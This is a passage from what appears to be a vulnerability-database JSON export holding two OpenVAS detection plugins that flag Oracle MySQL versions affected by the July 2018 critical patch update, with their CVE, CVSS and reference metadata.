USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:mysql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813715\");\n script_version(\"$Revision: 10538 $\");\n script_cve_id(\"CVE-2018-3054\", \"CVE-2018-3077\", \"CVE-2018-3056\", \"CVE-2018-3060\",\n \"CVE-2018-3065\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-18 12:58:40 +0200 (Wed, 18 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-18 12:35:29 +0530 (Wed, 18 Jul 2018)\");\n script_name(\"Oracle MySQL Security Updates-06 (jul2018-4258247) Linux\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle MySQL and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help\n of detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple errors\n in 'Server: DDL', 'Server: Security: Privileges', 'InnoDB' and 'Server: DML'\n components of MySQL Server.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote\n attackers to have an impact on confidentiality, integrity and availability. \n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Oracle MySQL version 5.7.22 and prior,\n 8.0.11 and prior on Linux\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from Reference link.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Databases\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!sqlPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\ninfos = get_app_version_and_location(cpe:CPE, port:sqlPort, exit_no_version:TRUE) ;\nmysqlVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:mysqlVer, test_version:\"5.7\", test_version2:\"5.7.22\")||\n version_in_range(version:mysqlVer, test_version:\"8.0\", test_version2:\"8.0.11\"))\n{\n report = report_fixed_ver(installed_version:mysqlVer, fixed_version: \"Apply the patch\");\n security_message(data:report, port:sqlPort);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-18T19:34:48", "references": ["http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"], "pluginID": "1361412562310813709", "description": "This host is running Oracle MySQL and is\n prone to multiple denial-of-service vulnerabilities.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-18T00:00:00", "title": "Oracle MySQL Security Updates-03 (jul2018-4258247) Linux", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-18T19:34:48", "vector": "NONE", "value": 7.5}}, "naslFamily": "Databases", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3077", "CVE-2018-3054"], "modified": "2018-07-18T00:00:00", "id": "OPENVAS:1361412562310813709", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813709", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_mysql_jul2018-4258247_03_lin.nasl 10538 2018-07-18 10:58:40Z santu $\n#\n# Oracle MySQL Security Updates-03 (jul2018-4258247) Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:mysql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813709\");\n script_version(\"$Revision: 10538 $\");\n script_cve_id(\"CVE-2018-3077\", \"CVE-2018-3054\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-18 12:58:40 +0200 (Wed, 18 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-18 12:33:05 +0530 (Wed, 18 Jul 2018)\");\n script_name(\"Oracle MySQL Security Updates-03 (jul2018-4258247) Linux\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle MySQL and is\n prone to multiple denial-of-service vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help\n of detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple errors\n in 'Server: DML' component of MySQL Server.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote\n attackers to conduct a denial-of-service condition. \n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Oracle MySQL version 5.7.22 and earlier\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from Reference link.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Databases\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!sqlPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\ninfos = get_app_version_and_location(cpe:CPE, port:sqlPort, exit_no_version:TRUE) ;\nmysqlVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:mysqlVer, test_version:\"5.7\", test_version2:\"5.7.22\"))\n{\n report = report_fixed_ver(installed_version:mysqlVer, fixed_version: \"Apply the patch\");\n security_message(data:report, port:sqlPort);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}}
